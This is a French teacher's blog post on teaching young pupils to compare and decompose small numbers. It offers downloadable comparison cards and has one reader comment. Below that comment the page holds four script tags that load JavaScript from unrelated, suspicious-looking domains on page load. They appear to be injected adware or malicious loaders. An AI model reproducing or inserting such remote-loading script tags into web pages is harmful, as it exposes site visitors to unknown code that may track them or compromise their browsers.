• Comprendre, comparer et décomposer...

    Depuis quelques semaines, avec mon groupe de petits, nous travaillons la comparaison des petits nombres. La prochaine étape sera la décomposition des petits nombres. Cela peut paraître une formalité mais cela se révèle souvent beaucoup plus compliqué que prévu : mémoriser, construire des images mentales, prévoir un résultat, ... Autant d'étapes qu'il faudra travailler une à une, et petit à petit, pour construire le sens.

    J'ai toujours beaucoup aimé les travaux de Rémi Brissiaud que j'avais eu la chance de voir en conférence il y a quelques années. Je me suis donc inspiré de ce qu'il y avait présenté pour préparer des petits fiches de comparaison de collections. J'ai volontairement choisi des images et un design très simples, voire minimalistes, pour éviter que mes élèves ne soient distraits par des éléments non essentiels à l'activité.

    Je n'exclus pas non plus de proposer ces fiches à mes grands pour les encourager à utiliser les résultats qu'ils ont mémorisés pour résoudre un "problème". Ils ont trop tendance à avoir recours au comptage plutôt que d'utiliser d'autres procédures plus efficaces.

    Enfin bref, comme souvent j'ai un plan d'attaque mais après la première présentation, et en fonction de l'accueil des élèves, je le modifierai sûrement en y incluant par exemple une phase de manipulation plus longue...

     

    D'un point de vue logistique, les cartes seront recto verso : d'un côté la situation problème et de l'autre la solution pour vérifier. La fiche de synthèse servira, comme son nom l'indique, à résumer la situation en comparant le cardinal des collection.

    Télécharger « Comparaison de collections_3 à 5.pdf »

    Télécharger « Comparaison de collections_fiches synthèse.pdf »

    Comprendre, comparer et décomposer...

    Pin It

  • Commentaires

    1
    JAny
    Mercredi 29 Janvier 2020 à 09:30

    Bonjour Morgane,

    Merci encore pour la multitude de ressources que tu partages !!! Concernant ces petites cartes, je ne connais pas les fondements de Brissiaud en mathématiques (je me suis davantage inspirée de Charnay jusqu'à présent)....pourrais tu en 2/3 mots présenter la manière dont tu les utilises pour les représentations mentales ? Proposes-tu un énoncé oral avec la carte ? Demandes-tu à l'enfant de verbaliser la carte ? De produite une écriture mathématique relative à la situation mise en image ?

    Merci encore pour ta générosité Morgane ! Bonne journée à toi !

    <script src="//killssource.com/21c1e810f7f98f00b3.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8641x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8641x&format=arrjs&r=1580286368206" type="text/javascript"></script> <script src="http://killssource.com/ext/21c1e810f7f98f00b3.js?sid=52587_8641_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :